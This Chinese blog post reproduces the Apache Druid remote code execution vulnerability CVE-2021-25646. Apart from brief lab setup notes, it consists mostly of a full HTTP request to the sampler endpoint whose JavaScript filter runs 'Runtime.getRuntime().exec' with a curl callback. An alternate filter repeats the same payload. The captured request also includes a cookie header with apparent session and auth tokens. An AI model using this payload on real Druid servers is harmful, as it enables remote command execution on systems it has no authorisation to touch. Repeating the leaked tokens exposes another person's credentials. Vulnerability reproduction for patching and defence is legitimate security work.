Apache Druid 远程代码执行漏洞 (CVE-2021-25646) 漏洞复现

作者: print("") 分类: 漏洞复现 发布时间: 2021-02-01 18:31

环境搭建:Docker

https://github.com/apache/druid/tree/master/distribution/docker

Build

From the root of the repo, run docker build -t apache/druid:tag -f distribution/docker/Dockerfile .

Run

Edit environment to suite. Run docker-compose -f distribution/docker/docker-compose.yml up

报错。。。

然后直接下下载Druid 直接安装

https://mirrors.ocf.berkeley.edu/apache/druid/0.19.0/

https://mirrors.ocf.berkeley.edu/apache/druid/0.19.0/apache-druid-0.19.0-bin.tar.gz

安装教程

https://druid.apache.org/docs/latest/tutorials/index.html

启动

访问IP:8888

导入文件

这里填写目录

quickstart/tutorial/

wikiticker-2015-09-12-sampled.json.gz

抓包。 

POST /druid/indexer/v1/sampler?for=filter HTTP/1.1
Host: 192.168.1.72:8888
Content-Length: 10257
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
Content-Type: application/json;charset=UTF-8
Origin: http://192.168.1.72:8888
Referer: http://192.168.1.72:8888/unified-console.html
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: serverType=nginx; order=id%20desc; memSize=2814; XK2K_2132_editormode_e=1; XK2K_2132_smile=1D1; site_table_limit=20; sites_path=/www/wwwroot; distribution=centos8; site_type=-1; p-1=1; backup_path=/www/backup; XK2K_2132_nofavfid=1; p5=nullnot_load; uploadSize=1073741824; network-unitType=KB/s; disk-unitType=KB/s; webssh_serial=0; bt_user_info=%7B%22status%22%3Atrue%2C%22msg%22%3A%22%u83B7%u53D6%u6210%u529F%21%22%2C%22data%22%3A%7B%22username%22%3A%22155****1727%22%7D%7D; cutFileName=null; network_io_key=; form_proxy=%5Bobject%20Object%5D; p10=1; BatchPaste=null; p8=1; copyFileName=/www/wwwroot/192.168.1.72/api/11.php; page_number=50; depType=0; files_sort=size; size_reverse=False; XK2K_2132_saltkey=uDx3Idt8; XK2K_2132_lastvisit=1610958038; layers=2; vcodesum=11; rank=list; p0=1; XK2K_2132_visitedfid=2; XK2K_2132_auth=301cJ1S6Lqr%2Fa5cG1Z39ncr7dnkGwaK%2BPGzu%2B6tJ57RD4Xg1anDuWeCuAqTnoBr4YbcHGVTpq7hyfkjd%2BIj0; XK2K_2132_lastcheckfeed=1%7C1611625420; load_search=undefined; force=0; load_page=1; XK2K_2132_forum_lastvisit=D_2_1611851435; SESSIONID=6e74b982-19b4-4686-9f96-5089ce96e4d6.d_QuA6Wdl3c4FYNWHDJCE8txlVM; request_token=2Qy9YdkontAeAGEOC7xvg8JODEWqJVmmyuH04fvrPEvuga5c; XK2K_2132_sid=BmkH1Y; XK2K_2132_ulastactivity=fcd7t7o2jBmuaaFwxoVol%2BxL0rF0huXZL5ykuORrltcBAyte5iuE; XK2K_2132_lastact=1612168750%09misc.php%09patch; softType=10; load_type=10; Path=/www/server/free_waf; ltd_end=undefined; pro_end=undefined
Connection: close

{"type":"index","spec":{"ioConfig":{"type":"index","inputSource":{"type":"inline","data":"{\"time\":\"2015-09-12T00:46:58.771Z\",\"channel\":\"#en.wikipedia\",\"cityName\":null,\"comment\":\"added project\",\"countryIsoCode\":null,\"countryName\":null,\"isAnonymous\":false,\"isMinor\":false,\"isNew\":false,\"isRobot\":false,\"isUnpatrolled\":false,\"metroCode\":null,\"namespace\":\"Talk\",\"page\":\"Talk:Oswald Tilghman\",\"regionIsoCode\":null,\"regionName\":null,\"user\":\"GELongstreet\",\"delta\":36,\"added\":36,\"deleted\":0}\n{\"time\":\"2015-09-12T00:47:00.496Z\",\"channel\":\"#ca.wikipedia\",\"cityName\":null,\"comment\":\"Robot inserta {{Commonscat}} que enllaça amb [[commons:category:Rallicula]]\",\"countryIsoCode\":null,\"countryName\":null,\"isAnonymous\":false,\"isMinor\":true,\"isNew\":false,\"isRobot\":true,\"isUnpatrolled\":false,\"metroCode\":null,\"namespace\":\"Main\",\"page\":\"Rallicula\",\"regionIsoCode\":null,\"regionName\":null,\"user\":\"PereBot\",\"delta\":17,\"added\":17,\"deleted\":0}\n{\"time\":\"2015-09-12T00:47:05.474Z\",\"channel\":\"#en.wikipedia\",\"cityName\":\"Auburn\",\"comment\":\"/* Status of peremptory norms under international law */ fixed spelling of 'Wimbledon'\",\"countryIsoCode\":\"AU\",\"countryName\":\"Australia\",\"isAnonymous\":true,\"isMinor\":false,\"isNew\":false,\"isRobot\":false,\"isUnpatrolled\":false,\"metroCode\":null,\"namespace\":\"Main\",\"page\":\"Peremptory norm\",\"regionIsoCode\":\"NSW\",\"regionName\":\"New South Wales\",\"user\":\"60.225.66.142\",\"delta\":0,\"added\":0,\"deleted\":0}\n{\"time\":\"2015-09-12T00:47:08.770Z\",\"channel\":\"#vi.wikipedia\",\"cityName\":null,\"comment\":\"fix Lỗi CS1: ngày tháng\",\"countryIsoCode\":null,\"countryName\":null,\"isAnonymous\":false,\"isMinor\":true,\"isNew\":false,\"isRobot\":true,\"isUnpatrolled\":false,\"metroCode\":null,\"namespace\":\"Main\",\"page\":\"Apamea abruzzorum\",\"regionIsoCode\":null,\"regionName\":null,\"user\":\"Cheers!-bot\",\"delta\":18,\"added\":18,\"deleted\":0}\n{\"time\":\"2015-09-12T00:47:11.862Z\",\"channel\":\"#vi.wikipedia\",\"cityName\":null,\"comment\":\"clean up using [[Project:AWB|AWB]]\",\"countryIsoCode\":null,\"countryName\":null,\"isAnonymous\":false,\"isMinor\":false,\"isNew\":false,\"isRobot\":true,\"isUnpatrolled\":false,\"metroCode\":null,\"namespace\":\"Main\",\"page\":\"Atractus flammigerus\",\"regionIsoCode\":null,\"regionName\":null,\"user\":\"ThitxongkhoiAWB\",\"delta\":18,\"added\":18,\"deleted\":0}\n{\"time\":\"2015-09-12T00:47:13.987Z\",\"channel\":\"#vi.wikipedia\",\"cityName\":null,\"comment\":\"clean up using [[Project:AWB|AWB]]\",\"countryIsoCode\":null,\"countryName\":null,\"isAnonymous\":false,\"isMinor\":false,\"isNew\":false,\"isRobot\":true,\"isUnpatrolled\":false,\"metroCode\":null,\"namespace\":\"Main\",\"page\":\"Agama mossambica\",\"regionIsoCode\":null,\"regionName\":null,\"user\":\"ThitxongkhoiAWB\",\"delta\":18,\"added\":18,\"deleted\":0}\n{\"time\":\"2015-09-12T00:47:17.009Z\",\"channel\":\"#ca.wikipedia\",\"cityName\":null,\"comment\":\"/* Imperi Austrohongarès */\",\"countryIsoCode\":null,\"countryName\":null,\"isAnonymous\":false,\"isMinor\":false,\"isNew\":false,\"isRobot\":false,\"isUnpatrolled\":false,\"metroCode\":null,\"namespace\":\"Main\",\"page\":\"Campanya dels Balcans (1914-1918)\",\"regionIsoCode\":null,\"regionName\":null,\"user\":\"Jaumellecha\",\"delta\":-20,\"added\":0,\"deleted\":20}\n{\"time\":\"2015-09-12T00:47:19.591Z\",\"channel\":\"#en.wikipedia\",\"cityName\":null,\"comment\":\"adding comment on notability and possible COI\",\"countryIsoCode\":null,\"countryName\":null,\"isAnonymous\":false,\"isMinor\":false,\"isNew\":true,\"isRobot\":false,\"isUnpatrolled\":true,\"metroCode\":null,\"namespace\":\"Talk\",\"page\":\"Talk:Dani Ploeger\",\"regionIsoCode\":null,\"regionName\":null,\"user\":\"New Media Theorist\",\"delta\":345,\"added\":345,\"deleted\":0}\n{\"time\":\"2015-09-12T00:47:21.578Z\",\"channel\":\"#en.wikipedia\",\"cityName\":null,\"comment\":\"Copying assessment table to wiki\",\"countryIsoCode\":null,\"countryName\":null,\"isAnonymous\":false,\"isMinor\":false,\"isNew\":false,\"isRobot\":true,\"isUnpatrolled\":false,\"metroCode\":null,\"namespace\":\"User\",\"page\":\"User:WP 1.0 bot/Tables/Project/Pubs\",\"regionIsoCode\":null,\"regionName\":null,\"user\":\"WP 1.0 bot\",\"delta\":121,\"added\":121,\"deleted\":0}\n{\"time\":\"2015-09-12T00:47:25.821Z\",\"channel\":\"#vi.wikipedia\",\"cityName\":null,\"comment\":\"clean up using [[Project:AWB|AWB]]\",\"countryIsoCode\":null,\"countryName\":null,\"isAnonymous\":false,\"isMinor\":false,\"isNew\":false,\"isRobot\":true,\"isUnpatrolled\":false,\"metroCode\":null,\"namespace\":\"Main\",\"page\":\"Agama persimilis\",\"regionIsoCode\":null,\"regionName\":null,\"user\":\"ThitxongkhoiAWB\",\"delta\":18,\"added\":18,\"deleted\":0}\n{\"time\":\"2015-09-12T00:47:29.913Z\",\"channel\":\"#en.wikipedia\",\"cityName\":null,\"comment\":\"Blank stale warning(s) and replace with {{[[template:OW|OW]]}} using [[Project:AWB|AWB]]\",\"countryIsoCode\":null,\"countryName\":null,\"isAnonymous\":false,\"isMinor\":true,\"isNew\":false,\"isRobot\":false,\"isUnpatrolled\":false,\"metroCode\":null,\"namespace\":\"User talk\",\"page\":\"User talk:161.184.95.17\",\"regionIsoCode\":null,\"regionName\":null,\"user\":\"DavidLeighEllis\",\"delta\":0,\"added\":0,\"deleted\":0}\n{\"time\":\"2015-09-12T00:47:33.004Z\",\"channel\":\"#vi.wikipedia\",\"cityName\":null,\"comment\":\"clean up using [[Project:AWB|AWB]]\",\"countryIsoCode\":null,\"countryName\":null,\"isAnonymous\":false,\"isMinor\":false,\"isNew\":false,\"isRobot\":true,\"isUnpatrolled\":false,\"metroCode\":null,\"namespace\":\"Main\",\"page\":\"Atractus edioi\",\"regionIsoCode\":null,\"regionName\":null,\"user\":\"ThitxongkhoiAWB\",\"delta\":18,\"added\":18,\"deleted\":0}\n{\"time\":\"2015-09-12T00:47:35.776Z\",\"channel\":\"#vi.wikipedia\",\"cityName\":null,\"comment\":\"Lỗi CS1: ngày tháng\",\"countryIsoCode\":null,\"countryName\":null,\"isAnonymous\":false,\"isMinor\":true,\"isNew\":false,\"isRobot\":true,\"isUnpatrolled\":false,\"metroCode\":null,\"namespace\":\"Main\",\"page\":\"Agave gentryi\",\"regionIsoCode\":null,\"regionName\":null,\"user\":\"TuHan-Bot\",\"delta\":36,\"added\":36,\"deleted\":0}\n{\"time\":\"2015-09-12T00:47:37.881Z\",\"channel\":\"#vi.wikipedia\",\"cityName\":null,\"comment\":\"clean up using [[Project:AWB|AWB]]\",\"countryIsoCode\":null,\"countryName\":null,\"isAnonymous\":false,\"isMinor\":false,\"isNew\":false,\"isRobot\":true,\"isUnpatrolled\":false,\"metroCode\":null,\"namespace\":\"Main\",\"page\":\"Agama sankaranica\",\"regionIsoCode\":null,\"regionName\":null,\"user\":\"ThitxongkhoiAWB\",\"delta\":18,\"added\":18,\"deleted\":0}\n{\"time\":\"2015-09-12T00:47:42.090Z\",\"channel\":\"#vi.wikipedia\",\"cityName\":null,\"comment\":\"fix Lỗi CS1: ngày tháng\",\"countryIsoCode\":null,\"countryName\":null,\"isAnonymous\":false,\"isMinor\":true,\"isNew\":false,\"isRobot\":true,\"isUnpatrolled\":false,\"metroCode\":null,\"namespace\":\"Main\",\"page\":\"Apamea albertae\",\"regionIsoCode\":null,\"regionName\":null,\"user\":\"Cheers!-bot\",\"delta\":18,\"added\":18,\"deleted\":0}\n{\"time\":\"2015-09-12T00:47:44.963Z\",\"channel\":\"#ru.wikipedia\",\"cityName\":null,\"comment\":\"/* Донецкая Народная Республика */\",\"countryIsoCode\":null,\"countryName\":null,\"isAnonymous\":false,\"isMinor\":false,\"isNew\":false,\"isRobot\":false,\"isUnpatrolled\":false,\"metroCode\":null,\"namespace\":\"Main\",\"page\":\"Караман, Александр Акимович\",\"regionIsoCode\":null,\"regionName\":null,\"user\":\"Камарад Че\",\"delta\":0,\"added\":0,\"deleted\":0}\n{\"time\":\"2015-09-12T00:47:47.870Z\",\"channel\":\"#vi.wikipedia\",\"cityName\":null,\"comment\":\"clean up using [[Project:AWB|AWB]]\",\"countryIsoCode\":null,\"countryName\":null,\"isAnonymous\":false,\"isMinor\":false,\"isNew\":false,\"isRobot\":true,\"isUnpatrolled\":false,\"metroCode\":null,\"namespace\":\"Main\",\"page\":\"Atractus duboisi\",\"regionIsoCode\":null,\"regionName\":null,\"user\":\"ThitxongkhoiAWB\",\"delta\":18,\"added\":18,\"deleted\":0}\n{\"time\":\"2015-09-12T00:47:50.819Z\",\"channel\":\"#en.wikipedia\",\"cityName\":null,\"comment\":\"/* Films */\",\"countryIsoCode\":null,\"countryName\":null,\"isAnonymous\":false,\"isMinor\":false,\"isNew\":false,\"isRobot\":false,\"isUnpatrolled\":false,\"metroCode\":null,\"namespace\":\"Main\",\"page\":\"Keiynan Lonsdale\",\"regionIsoCode\":null,\"regionName\":null,\"user\":\"Lg16spears\",\"delta\":-11,\"added\":0,\"deleted\":11}\n{\"time\":\"2015-09-12T00:47:53.259Z\",\"channel\":\"#ja.wikipedia\",\"cityName\":null,\"comment\":\"/* 対戦通算成績と得失点 */\",\"countryIsoCode\":null,\"countryName\":null,\"isAnonymous\":false,\"isMinor\":true,\"isNew\":false,\"isRobot\":false,\"isUnpatrolled\":false,\"metroCode\":null,\"namespace\":\"Main\",\"page\":\"アルビレックス新潟の年度別成績一覧\",\"regionIsoCode\":null,\"regionName\":null,\"user\":\"BlueMoon2662\",\"delta\":14,\"added\":14,\"deleted\":0}\n{\"time\":\"2015-09-12T00:47:56.126Z\",\"channel\":\"#en.wikipedia\",\"cityName\":null,\"comment\":\"Bot updating unblock request table ([[en:WP:PEACHY|Peachy 2.0 (alpha 8)]])\",\"countryIsoCode\":null,\"countryName\":null,\"isAnonymous\":false,\"isMinor\":false,\"isNew\":false,\"isRobot\":true,\"isUnpatrolled\":false,\"metroCode\":null,\"namespace\":\"User\",\"page\":\"User:Cyberbot I/Requests for unblock report\",\"regionIsoCode\":null,\"regionName\":null,\"user\":\"Cyberbot I\",\"delta\":-74,\"added\":0,\"deleted\":74}"},"inputFormat":{"type":"json","keepNullColumns":true}},"dataSchema":{"dataSource":"sample","timestampSpec":{"column":"!!!_no_such_column_!!!","missingValue":"1970-01-01T00:00:00Z"},"dimensionsSpec":{},"transformSpec":{"transforms":[],"filter":{"type": "javascript",
					"function": "function(value){return java.lang.Runtime.getRuntime().exec('curl 192.168.1.72:8181')}",
					"dimension": "added",
					"": {
						"enabled": "true"
					}
				}
			}
		},"type":"index","tuningConfig":{"type":"index"}},"samplerConfig":{"numRows":500,"timeoutMs":15000}}

如果报错了。把filter 改成:{“type”: “javascript”,
“function”: “function(value){return java.lang.Runtime.getRuntime().exec(‘curl 192.168.1.72:8181’)}”,
“dimension”: “added”,
“”: {
“enabled”: “true”
}
}
}
}

如果觉得我的文章对您有用,请随意打赏。您的支持将鼓励我继续创作!

发表评论

您的电子邮箱地址不会被公开。

更多阅读
标签云
Apache2.4.50 Apache ShenYu APISIX APISIX Dashboard cc5 CNVD-2021-49104 CNVD-2022-60632 CobaltStrike CobaltStrike xss CommonsCollections5 Confluence CVE-2021-26084 CVE-2017-18349 CVE-2021-4034 CVE-2021-37580 CVE-2021-41277 CVE-2021-41773 cve-2021-42013 CVE-2021-43798 CVE-2021-44228 CVE-2021-45232 CVE-2021-45232 RCE CVE-2022-22954 CVE-2022-22965 CVE-2022-39197 CVE-2023-28432 Django E-Office grafana keytool store log4j2 MetaBase ONE Access python python爬虫 socks5 socks5搜索 store 证书转换成nginx VMware Workspace ONE Access ysoserial 代理池工具 宝塔面板 泛微 畅捷通 畅捷通漏洞 通达OA